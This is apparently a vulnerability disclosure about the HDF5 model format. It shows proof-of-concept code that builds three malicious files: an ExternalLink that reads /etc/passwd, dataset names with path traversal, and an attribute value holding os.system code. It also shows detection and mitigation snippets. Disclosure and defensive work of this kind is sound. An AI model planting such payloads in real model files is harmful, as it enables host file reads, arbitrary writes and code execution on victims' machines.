HDF5: External Link File Read + Path Traversal + Attribute Injection

Summary

Three non-pickle attack classes against the HDF5 model file format (.h5, .hdf5) that bypass both picklescan 1.0.4 and modelscan 0.8.8 (3/3 MISSED by both):

  1. External link β†’ arbitrary file read β€” HDF5 ExternalLink objects reference files on the host filesystem. When accessed, h5py opens the linked file. A malicious model with ExternalLink("/etc/passwd", "/") reads host files.
  2. Path traversal in dataset names β€” Dataset paths like ../../../tmp/evil are accepted and preserved in the HDF5 virtual filesystem. Tools that extract datasets to disk write outside the target directory.
  3. Code injection in attributes β€” Attribute names and values accept arbitrary strings including Python code and path traversal characters. Downstream tools that eval attributes or use attribute names as paths are vulnerable.

Format: HDF5 (.h5, .hdf5) — $1,500 MFV
Scanners tested: picklescan 1.0.4, modelscan 0.8.8 — 3/3 payloads MISSED by both

Payloads

| File | Attack | Impact | picklescan | modelscan |
|---|---|---|---|---|
| hdf5_external_link.h5 | ExternalLink("/etc/passwd", "/") | Arbitrary file read when link is accessed | MISSED | MISSED |
| hdf5_traversal.h5 | Dataset path ../../../tmp/pwned | File write on dataset extraction | MISSED | MISSED |
| hdf5_attr_injection.h5 | Code in attribute value + traversal in attribute name | Injection if attrs are evaluated or used as paths | MISSED | MISSED |

Vulnerability Details

External Link β†’ File Read (CWE-22)

HDF5 supports external links that reference other files. When a dataset accessed via an external link is read, h5py opens the referenced file from the host filesystem:

import h5py, numpy as np

# Create malicious model
with h5py.File("evil_model.h5", 'w') as f:
    f.create_dataset("weights", data=np.random.randn(10, 10))
    f["secret_data"] = h5py.ExternalLink("/etc/passwd", "/")

# Victim loads model and iterates datasets:
with h5py.File("evil_model.h5", 'r') as f:
    for key in f.keys():
        data = f[key]  # accessing "secret_data" opens /etc/passwd

In ML pipelines, models are loaded from untrusted sources (Hugging Face Hub, shared storage). The external link is embedded in the HDF5 file itself β€” no user interaction beyond loading.
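As a defensive sketch (not part of the original report), external links can be enumerated without dereferencing them: h5py's Group.get(name, getlink=True) returns the link object itself instead of opening the target file, so a scanner can flag ExternalLink entries before any host file is touched. The function name is illustrative; soft links are ignored here for brevity.

```python
import h5py
import numpy as np

def find_external_links(path):
    """Recursively list external links in an HDF5 file without
    resolving (opening) the files they point to."""
    findings = []

    def walk(group, prefix=""):
        for name in group.keys():
            # getlink=True returns the link object without dereferencing it
            link = group.get(name, getlink=True)
            full = f"{prefix}/{name}"
            if isinstance(link, h5py.ExternalLink):
                findings.append((full, link.filename, link.path))
            elif isinstance(link, h5py.HardLink):
                obj = group[name]
                if isinstance(obj, h5py.Group):
                    walk(obj, full)  # recurse only into in-file groups

    with h5py.File(path, "r") as f:
        walk(f)
    return findings
```

Running this on the payload above reports ("/secret_data", "/etc/passwd", "/") without ever opening /etc/passwd.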

Path Traversal in Dataset Names (CWE-22)

HDF5's virtual filesystem accepts path traversal in group/dataset names:

import h5py, numpy as np

with h5py.File("model.h5", 'w') as f:
    f.create_dataset("../../../tmp/pwned", data=np.array([1.0]))

HDF5 gives no special meaning to a .. path component — it is stored as a literal group name, so the full traversal string survives verbatim in the file. Tools that map HDF5 object paths directly to filesystem paths during extraction will write outside the target directory.
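A minimal mitigation sketch for extraction tools (names are illustrative, not from the report): lexically resolve the candidate output path and refuse anything that escapes the output directory.

```python
import os

def safe_extract_path(out_dir, hdf5_path):
    """Map an HDF5 object path to a filesystem path, rejecting
    names that would escape out_dir via .. components.
    (Illustrative helper, not part of any h5py API.)"""
    out_dir = os.path.realpath(out_dir)
    # Strip any leading slash, then resolve ".." lexically
    candidate = os.path.normpath(os.path.join(out_dir, hdf5_path.lstrip("/")))
    if os.path.commonpath([out_dir, candidate]) != out_dir:
        raise ValueError(f"dataset name escapes output dir: {hdf5_path!r}")
    return candidate
```

With this check, a dataset named ../../../tmp/pwned raises ValueError instead of being written to /tmp/pwned.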

Attribute Injection (CWE-94)

Attribute names and values are unrestricted:

import h5py, numpy as np

with h5py.File("model.h5", 'w') as f:
    ds = f.create_dataset("weights", data=np.random.randn(10, 10))
    ds.attrs["../../../tmp/evil"] = "traversal in attr name"
    ds.attrs["description"] = '__import__("os").system("id")'

Verified: both attribute names with path traversal and values with Python code are preserved verbatim. Tools that:

  • Use attribute names as file paths (export tools)
  • Render attribute values in web UIs (model registries)
  • Pass attribute values to template engines or eval()

are vulnerable to injection.
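A heuristic pre-load check along these lines can flag suspicious attributes (the allowlist regex and the "code-like" pattern are assumptions for illustration — real scanners would need broader patterns, and root-level attributes are not covered by visititems):

```python
import re
import h5py
import numpy as np

# Assumed-safe attribute names: alphanumerics, underscore, dot, hyphen
SAFE_NAME = re.compile(r"^[A-Za-z0-9_.\-]+$")

def check_attrs(path):
    """Flag attribute names/values that look like path traversal or code."""
    suspicious = []
    with h5py.File(path, "r") as f:
        def visit(name, obj):
            for key, value in obj.attrs.items():
                if not SAFE_NAME.match(key):
                    suspicious.append((name, key, "unsafe attribute name"))
                if isinstance(value, (str, bytes)) and "__import__" in str(value):
                    suspicious.append((name, key, "code-like attribute value"))
        f.visititems(visit)  # visits groups and datasets below the root
    return suspicious
```

On the payload above this reports both the traversal attribute name and the code-bearing description value.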

Proof of Concept

import h5py, numpy as np

# Payload 1: External link
with h5py.File("hdf5_external_link.h5", 'w') as f:
    f.create_dataset("weights", data=np.random.randn(10, 10))
    f["secret"] = h5py.ExternalLink("/etc/passwd", "/")

# Payload 2: Path traversal
with h5py.File("hdf5_traversal.h5", 'w') as f:
    f.create_dataset("../../../tmp/pwned", data=np.array([1.0, 2.0]))
    f.create_dataset("normal_weights", data=np.random.randn(10, 10))

# Payload 3: Attribute injection
with h5py.File("hdf5_attr_injection.h5", 'w') as f:
    ds = f.create_dataset("weights", data=np.random.randn(10, 10))
    ds.attrs["../../../tmp/evil"] = "traversal in attr name"
    ds.attrs["description"] = '__import__("os").system("id")'
